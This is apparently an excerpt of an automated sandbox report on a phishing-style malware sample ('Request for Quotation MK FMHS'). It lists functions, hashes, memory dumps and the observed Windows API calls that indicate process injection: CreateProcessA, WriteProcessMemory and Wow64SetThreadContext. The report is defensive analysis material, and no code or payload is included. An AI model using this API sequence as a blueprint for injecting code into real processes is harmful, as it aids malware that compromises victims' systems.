Instruction Fuzzy Hash: 54113078F001498FDF14DFECD954BAEBBB1BB49311F00E4A1E808EB344E67099428B51

Function 010FD03F Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4515610178.00000000010FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10fd000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 244c614e04a80719a4cbb1e35d09afbc7f52f2045db6f081cea45e42cbbeead8
Instruction ID: 0d0ee5201910dbba238884201cfeb91d3bbbcb3aba7665d4c046448e8561dbcb
Opcode Fuzzy Hash: 244c614e04a80719a4cbb1e35d09afbc7f52f2045db6f081cea45e42cbbeead8
Instruction Fuzzy Hash: 9D11DD75504284DFDB12CF54C9C4B15BFA2FB84314F24C6AEEA894BA52C33AD44ACF62

Function 01255E98 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4516022475.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1250000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a5b4e53737f127e004329ac11884522f8a98bfe802c48cd2bf80158187816dd9
Instruction ID: 46278af7a51a6c746a4270362399a7e1475e25fbf030d10fb6d23eb5a6dbadcc
Opcode Fuzzy Hash: a5b4e53737f127e004329ac11884522f8a98bfe802c48cd2bf80158187816dd9
Instruction Fuzzy Hash: 46014772B002556FCB519E989850AAF3FA7EFD8350F18801AFE04CB384DE728D129B91

Function 05978EF1 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4528284472.0000000005970000.00000040.00000800.00020000.00000000.sdmp, Offset: 05970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5970000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34b988a75e9ea408cd2503749b2c439380aa121d2ed162e5ffafe2a3fd168ed8
Instruction ID: 9d04e7280f3624fb7e69dd68742b613d7e1633e956a2b45c7f8ad21ef821347b
Opcode Fuzzy Hash: 34b988a75e9ea408cd2503749b2c439380aa121d2ed162e5ffafe2a3fd168ed8
Instruction Fuzzy Hash: 1B1164B6800249DFCB10CF99C945BEEBFF5EF48320F14841AE528A7211C339A550DFA0

Function 0125ABE0 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4516022475.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1250000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d043b39aa83105df541ce75de77bb76ed0f74894de3ce146bfa48e8255f405c8
Instruction ID: 9a42c4e3388ee05a537a4ba2eb019a663633fe42b7ab5e905eb65fef0b23c2ce
Opcode Fuzzy Hash: d043b39aa83105df541ce75de77bb76ed0f74894de3ce146bfa48e8255f405c8
Instruction Fuzzy Hash: 83F021313202114B97255A2EE49962E7BDEEFC8E52305417AEF05C7365EE31CC038380

Function 0125E8E8 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4516022475.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1250000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2715a72a9abda1a17413c92e46b91c5f9c18a3a065cf48181d04850eac57be9
Instruction ID: c6c8d035035d5e2228d084dca113bc77cebd36fbbb080e4235dae3270cce9cb7
Opcode Fuzzy Hash: a2715a72a9abda1a17413c92e46b91c5f9c18a3a065cf48181d04850eac57be9
Instruction Fuzzy Hash: 331148B8D0420ADFCF41DFA8D8859EEBBB1FB49300F01856AD910A3354E7755A1ADFA1

Function 01259C23 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4516022475.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1250000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f54838979100d7b752983fd6ded645998ec101168c978125cc041181b7ad2d96
Instruction ID: 6b812f207353b2704055a8696b850cec8e9ee5b26ac6e512499bc8abe0024963
Opcode Fuzzy Hash: f54838979100d7b752983fd6ded645998ec101168c978125cc041181b7ad2d96
Instruction Fuzzy Hash: 1DF09071914254DFCB519F68A8486EABFF5EF89321F048066E908C7251D2314955CB51

Function 01256347 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4516022475.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1250000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a7f555627c312396af809822ff0b4785a8e15e6cd70de44ba8b6f9be60465f4
Instruction ID: 57f19e752f3c8eb9c8a64735abead773a58236a2468c6492a2c9aee0157c6823
Opcode Fuzzy Hash: 3a7f555627c312396af809822ff0b4785a8e15e6cd70de44ba8b6f9be60465f4
Instruction Fuzzy Hash: A7F08236B111225BEB26272D945816F7392ABC5A663594539CE029B759CF35CD0247C0

Function 0125F5C0 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4516022475.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1250000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 28dc774cd5428de46fb09d817c1b2e43ba3dd689224d4376d463d1708a29f02a
Instruction ID: bfe370a99da667d04b36751eb45a899dff148555ab457badb0d5747460ab715f
Opcode Fuzzy Hash: 28dc774cd5428de46fb09d817c1b2e43ba3dd689224d4376d463d1708a29f02a
Instruction Fuzzy Hash: D5F03AB1A21125CFCB84EF7CD54556E77F4AF0821072144A9D909DB321EB70DD008BD0

Function 012528A3 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4516022475.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1250000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbfa8b414235f5ff082b77bcbdd2857b0e8c88ddbdc7224a631a131a443e4525
Instruction ID: ea53eff976fbb780f6531ad4b1f0bc6e8a60f95c13d28dd7c7b6e7e16b423404
Opcode Fuzzy Hash: fbfa8b414235f5ff082b77bcbdd2857b0e8c88ddbdc7224a631a131a443e4525
Instruction Fuzzy Hash: 4CE02635D54367CACB01E7F59C000EEBB34EDCB121B19899BC0A137090EB302219C7A1

Function 01256739 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4516022475.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1250000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 138060164abbd26cdf59571771600aed9cc93ad5c8de935d5d1b5167e3b5f624
Instruction ID: 176a3dd11f2f6cc3ed20bd34dec62470fdb7d825f13745883ed7151ea225fc3b
Opcode Fuzzy Hash: 138060164abbd26cdf59571771600aed9cc93ad5c8de935d5d1b5167e3b5f624
Instruction Fuzzy Hash: C5E02BB28043978FCB47FB34E89648D3F77AB92300B04C656E0054E65ADEB4484A8B13

Function 012528B0 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4516022475.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1250000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 797b58a0908ed2b2166e31f08a3245b2f4db8d4d8e4bffc680d6a1854a4fe2e7
Instruction ID: 2be7e9a532f9ddf656837a3c96b66edeb62f39ef54a242ce2bd4e50450fd548f
Opcode Fuzzy Hash: 797b58a0908ed2b2166e31f08a3245b2f4db8d4d8e4bffc680d6a1854a4fe2e7
Instruction Fuzzy Hash: 10D02B31D2022F83CF04E7A5DC004DFF738EEC2260B514622D41033000FB302658C2E0

Function 01258EF8 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4516022475.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1250000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
Instruction ID: 7930617fa5d51c39259ce62e19d9372f750b87a255e52d71a4f40799174ae589
Opcode Fuzzy Hash: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
Instruction Fuzzy Hash: 8AC0123321C1282BA365204FBC81AA3AA8DC2C92B4AA10137FF1C93200A8929C8002A8

Function 0125D6D4 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4516022475.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1250000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa75666314f4472802adf3093eafd3cd411204230ac9146551cee0c79b5f2a6f
Instruction ID: 7a41b196844e2d09aa38273734c3c64bfb4c641392eb058ed4568f396abefbb3
Opcode Fuzzy Hash: aa75666314f4472802adf3093eafd3cd411204230ac9146551cee0c79b5f2a6f
Instruction Fuzzy Hash: 19D04275E1410DCBCB30DFA8F4894EDBB71EB99321B14642AD925A3255D63054558F11

Function 0125AFAD Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4516022475.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1250000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00ee99c08ec6b28724f7e81c04519595c91ddf1eb8b3f55a9e283d0624aa4b7c
Instruction ID: ccf56a4f08847c19208f4ad5e4c5abfa395ab00656c6ea65d20dd132484e872d
Opcode Fuzzy Hash: 00ee99c08ec6b28724f7e81c04519595c91ddf1eb8b3f55a9e283d0624aa4b7c
Instruction Fuzzy Hash: E8D0673AB400189FCB149F98E8848DDF776FB98221B048116EA15A3265C6319925DB60

Function 01256748 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4516022475.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1250000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e22628a84785c3fa8702de3e82ec08fa68239f062a9d5760a6f2f0d0bc9b3b0
Instruction ID: 281065f6d04ded2e72cf7bb440c43f494aefa466b9566facd8a98caf75b25cdd
Opcode Fuzzy Hash: 2e22628a84785c3fa8702de3e82ec08fa68239f062a9d5760a6f2f0d0bc9b3b0
Instruction Fuzzy Hash: 4EC0127200070ACAC605FB76FC85955376AA7802047409914B0050A74DEE7468995792

Non-executed Functions

Function 01252A69 Relevance: 5.1, Strings: 4, Instructions: 96COMMON

Download Yara Rule

Strings

Xwq, xrefs: 01252A9E
Xwq, xrefs: 01252B57
Xwq, xrefs: 01252AD8
Xwq, xrefs: 01252BA4

Memory Dump Source

Source File: 00000009.00000002.4516022475.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1250000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID: Xwq$Xwq$Xwq$Xwq
API String ID: 0-1964751375
Opcode ID: 4ff7cfe9be041963d90a47fd3f1deee207e6999101d5a93847f8cca553eda26a
Instruction ID: 080a924db8dd1e1e2be5c8440dada298906a49abc18c68bc960d946d08c87543
Opcode Fuzzy Hash: 4ff7cfe9be041963d90a47fd3f1deee207e6999101d5a93847f8cca553eda26a
Instruction Fuzzy Hash: 3E317371E1421ACBDFB5CA6C88C13BEBBB6BB94350F144469C915A73C1EF708A418B92

Function 01256920 Relevance: 5.0, Strings: 4, Instructions: 49COMMON

Download Yara Rule

Strings

\;sq, xrefs: 01256936
\;sq, xrefs: 01256952
\;sq, xrefs: 0125695E
\;sq, xrefs: 0125692C

Memory Dump Source

Source File: 00000009.00000002.4516022475.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1250000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID: \;sq$\;sq$\;sq$\;sq
API String ID: 0-2251010532
Opcode ID: 197a86e04a605cb25e636799150ca6819f29db3e91d7a0fd9d59ee79c31decd7
Instruction ID: e5c0462bfbdf61af822bb13d6dd20a50a3af1dd3d70f5d6518322d19dee73951
Opcode Fuzzy Hash: 197a86e04a605cb25e636799150ca6819f29db3e91d7a0fd9d59ee79c31decd7
Instruction Fuzzy Hash: 1A01DF317301068FDBA48A2CC4C0AA5B7F6BFC86607A5406AEA05CB372DE71DC818781

Analysis Process: jnqeRRexnD.exePID: 2820, Parent PID: 1068COMMON

Execution Graph

Execution Coverage:	11.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	177
Total number of Limit Nodes:	8

Executed Functions

Function 00BDCF90 Relevance: 6.1, APIs: 4, Instructions: 133
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00BDD01E
GetCurrentThread.KERNEL32 ref: 00BDD05B
GetCurrentProcess.KERNEL32 ref: 00BDD098
GetCurrentThreadId.KERNEL32 ref: 00BDD0F1

Memory Dump Source

Source File: 0000000B.00000002.2160163531.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_bd0000_jnqeRRexnD.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: d8e31a5786bf49b858c07eb21bb82e00b24292119cf59330779e8a82f660e6de
Instruction ID: 909d501364f8f4dc27c70be91588f25e74916a8534e9a945f23250e94904ad6b
Opcode Fuzzy Hash: d8e31a5786bf49b858c07eb21bb82e00b24292119cf59330779e8a82f660e6de
Instruction Fuzzy Hash: B45188B0901349CFDB54DFA9D548B9EBBF1FF88314F24849AE409A7350DB38A945CB62

Function 00BDCFA0 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00BDD01E
GetCurrentThread.KERNEL32 ref: 00BDD05B
GetCurrentProcess.KERNEL32 ref: 00BDD098
GetCurrentThreadId.KERNEL32 ref: 00BDD0F1

Memory Dump Source

Source File: 0000000B.00000002.2160163531.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_bd0000_jnqeRRexnD.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: bb1ab7d7dfe24920809bd4c76d3bef7aef2ddcbf1032db85d26af9e63b456445
Instruction ID: a0bbcc38ecf56c90f67ce0cef55a0c5703c7bced07c64f26a5c92bdc7997b764
Opcode Fuzzy Hash: bb1ab7d7dfe24920809bd4c76d3bef7aef2ddcbf1032db85d26af9e63b456445
Instruction Fuzzy Hash: 695177B0901309CFDB54DFA9C548B9EBBF5FF88314F20845AE409A7350D778A945CB62

Function 069A7F64 Relevance: 1.7, APIs: 1, Instructions: 246
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 069A81A6

Memory Dump Source

Source File: 0000000B.00000002.2165934504.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_69a0000_jnqeRRexnD.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: f3002f82535b532d048bb5367861cd8f6228869c2f7a6c001ff89ac1eade7a6f
Instruction ID: 7501a83a89aef63a6859fd7ab6c48e344ca0e33e98864b3f0bcea4ba9001bebc
Opcode Fuzzy Hash: f3002f82535b532d048bb5367861cd8f6228869c2f7a6c001ff89ac1eade7a6f
Instruction Fuzzy Hash: 82A18971D007298FDF60CFA8C941BEEBBF2BB48310F1485A9E808A7240DB759985CF91

Function 069A7F70 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 069A81A6

Memory Dump Source

Source File: 0000000B.00000002.2165934504.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_69a0000_jnqeRRexnD.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 742eaf1824b690b15485dcbba5a681787529c8be764d5ff653c226278ae44c41
Instruction ID: c7e09a3af3a7f706c8a322876397e7dc1920f396ec8cff03af17d82932bf9ed1
Opcode Fuzzy Hash: 742eaf1824b690b15485dcbba5a681787529c8be764d5ff653c226278ae44c41
Instruction Fuzzy Hash: 10917971D007298FDF64DFA8C9417EEBAF2BB48310F1485A9E808A7640DB759985CF91

Function 00BDAD08 Relevance: 1.7, APIs: 1, Instructions: 197
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 00BDAF5E

Memory Dump Source

Source File: 0000000B.00000002.2160163531.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_bd0000_jnqeRRexnD.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 4f50effd043e975711296cc95a700878e963aa66b966b6c6ad48cf7b96c2bd0a
Instruction ID: 8c6f0f119dbe7976b98aa89bc9b1594b19e10057f372bc7d1e9acc582b14da30
Opcode Fuzzy Hash: 4f50effd043e975711296cc95a700878e963aa66b966b6c6ad48cf7b96c2bd0a
Instruction Fuzzy Hash: 7F7122B0A00B058FD724DF29C04175ABBF6FF88304F10896AE49AD7B50E774E949CB92

Function 00BD58EC Relevance: 1.6, APIs: 1, Instructions: 98
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 00BD59A9

Memory Dump Source

Source File: 0000000B.00000002.2160163531.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_bd0000_jnqeRRexnD.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 60b5563763407bbe817bf8243e98e672740f1ffb00e3645c3c62792089155314
Instruction ID: 5b9740f78e8e67e61f32ffc02183326343624fd054b4af82da91a5a83bf423f5
Opcode Fuzzy Hash: 60b5563763407bbe817bf8243e98e672740f1ffb00e3645c3c62792089155314
Instruction Fuzzy Hash: 6A41D1B0C00A19CBDB24DFA9C984B8DFBF6FF48314F20815AD408AB251DB756946CF90

Function 00BD5A64 Relevance: 1.6, APIs: 1, Instructions: 98
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000B.00000002.2160163531.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_bd0000_jnqeRRexnD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 689fd002d22737bf2d5a9a78e4434a19d8563214eb4feb7920debb724448456e
Instruction ID: 3d47a42024e178736e55e01ece715ac1baf23e338849942168b60b7f7b6da151
Opcode Fuzzy Hash: 689fd002d22737bf2d5a9a78e4434a19d8563214eb4feb7920debb724448456e
Instruction Fuzzy Hash: BE31EDB5804A58CFDF21CFA8C8847DEFBF1EF56314F14828AC005AB252D739A94ACB41

Function 00BD44B0 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 00BD59A9

Memory Dump Source

Source File: 0000000B.00000002.2160163531.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_bd0000_jnqeRRexnD.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 1db18446c88bae9238ab402acd71a508975c3785ed30d70fe34ccbac3b44f029
Instruction ID: 716d2a699804e32492be805b0057782c15969a5b0ff400e05a0662b0ccd0e8fc
Opcode Fuzzy Hash: 1db18446c88bae9238ab402acd71a508975c3785ed30d70fe34ccbac3b44f029
Instruction Fuzzy Hash: 4D41AFB0C00619CBDB24DFA9C984B9EBBF6FF49304F20856AD408AB251DB756945CF90

Function 069A7CE0 Relevance: 1.6, APIs: 1, Instructions: 72
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 069A7D78

Memory Dump Source

Source File: 0000000B.00000002.2165934504.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_69a0000_jnqeRRexnD.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 31c29bbc06f55478f05f42abea23db1f3fac8d18fbb2e84a137c6d93b9b1bdfd
Instruction ID: 70e22cfd227aec2616dcd1741768dad5ab416a67b055e079dde5c3c209614440
Opcode Fuzzy Hash: 31c29bbc06f55478f05f42abea23db1f3fac8d18fbb2e84a137c6d93b9b1bdfd
Instruction Fuzzy Hash: B52128B5D003499FCB10CFA9C985BEEBBF5FF48320F10842AE519A7250D7789954DBA1

Function 069A7CE8 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 069A7D78

Memory Dump Source

Source File: 0000000B.00000002.2165934504.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_69a0000_jnqeRRexnD.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: cc1ee3e57f60abb12124a16e50e959c7093a0c6869cb745cf3d60a7dd94d1c84
Instruction ID: bdd6df3e13afcf42cf53eff07ce5c21da232fd0b72b75ca5d208e707b9f5e866
Opcode Fuzzy Hash: cc1ee3e57f60abb12124a16e50e959c7093a0c6869cb745cf3d60a7dd94d1c84
Instruction Fuzzy Hash: DF2127B5D003499FCB10CFA9C985BEEBBF5FF48320F10842AE919A7250D7789944DBA0

Function 069A7B48 Relevance: 1.6, APIs: 1, Instructions: 69
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 069A7BCE

Memory Dump Source

Source File: 0000000B.00000002.2165934504.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_69a0000_jnqeRRexnD.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 7f7a0aead74f5c8c121533437c5ffe91b9ff40252efcf5dcea73f2b4b9e24c7e
Instruction ID: 975b7e2ce18da0597fa4ea50a8e79506ac9c71af69634889a9cbb619a9ccac03
Opcode Fuzzy Hash: 7f7a0aead74f5c8c121533437c5ffe91b9ff40252efcf5dcea73f2b4b9e24c7e
Instruction Fuzzy Hash: 9F214AB1D003099FDB10DFAAC485BEFBBF4EF48324F10842AD419A7240C7789545CBA0

Function 069A7DD0 Relevance: 1.6, APIs: 1, Instructions: 66COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 069A7E58

Memory Dump Source

Source File: 0000000B.00000002.2165934504.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_69a0000_jnqeRRexnD.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 200f993d768f68bbd1ae37d1e877a22ba47c93302e3e4ee5d00a1da606f80b6a
Instruction ID: d79e531deefd32dec423554fa5d373ffc591559e3ca4363b3c4af778f05f37f9
Opcode Fuzzy Hash: 200f993d768f68bbd1ae37d1e877a22ba47c93302e3e4ee5d00a1da606f80b6a
Instruction Fuzzy Hash: A02119B1D003599FCB10DFAAC881AEEBBF5FF48320F20842AE519A7250C7759955DBA1

Function 00BDD5E9 Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00BDD677

Memory Dump Source

Source File: 0000000B.00000002.2160163531.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_bd0000_jnqeRRexnD.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: d4b0212073fb9946422c62ee1575e02197a567b29150cf9b65cb6d02bb8f9df1
Instruction ID: fb60ce5d4dc9c3cac22c00c83b4869e1d9f4c7299800c82c2f6d0189819623d4
Opcode Fuzzy Hash: d4b0212073fb9946422c62ee1575e02197a567b29150cf9b65cb6d02bb8f9df1
Instruction Fuzzy Hash: AA2105B59002089FDB10CFAAD484ADEFFF5EB48320F14801AE918A3310D374A940DFA0

Function 069A7DD8 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 069A7E58

Memory Dump Source

Source File: 0000000B.00000002.2165934504.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_69a0000_jnqeRRexnD.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 9ab4689afcb1407ffb7aad77f4ced6669211f7344bd55a1f20ddbdd3fe86b3eb
Instruction ID: a6cb26ca8812060cd22f339c7fd8a1f1cbb623f60dee1b2a41b25512e0c1990a
Opcode Fuzzy Hash: 9ab4689afcb1407ffb7aad77f4ced6669211f7344bd55a1f20ddbdd3fe86b3eb
Instruction Fuzzy Hash: AA213CB1C003499FCB10DFAAC841AEEFBF5FF48320F10842AE519A7250C7749900DBA0

Function 069A7B50 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 069A7BCE

Memory Dump Source

Source File: 0000000B.00000002.2165934504.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_69a0000_jnqeRRexnD.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 65fa8a123735f4655972994caa02865d95f21112b1013adaf2c7a5d5d669d454
Instruction ID: b6cd517d4f3f82a59cbe3a41b071214fa605d5b070e1c6852ab0ffe636bf8299
Opcode Fuzzy Hash: 65fa8a123735f4655972994caa02865d95f21112b1013adaf2c7a5d5d669d454
Instruction Fuzzy Hash: A72107B5D003098FDB50DFAAC485BAEBBF5EF88324F14842AD519A7240C778A945CBA1

Function 00BDD5F0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00BDD677

Memory Dump Source

Source File: 0000000B.00000002.2160163531.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_bd0000_jnqeRRexnD.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: d1b81f3b909fd6d3cce6a8d01950647becf53121f6bfac67982d51c47f1dd584
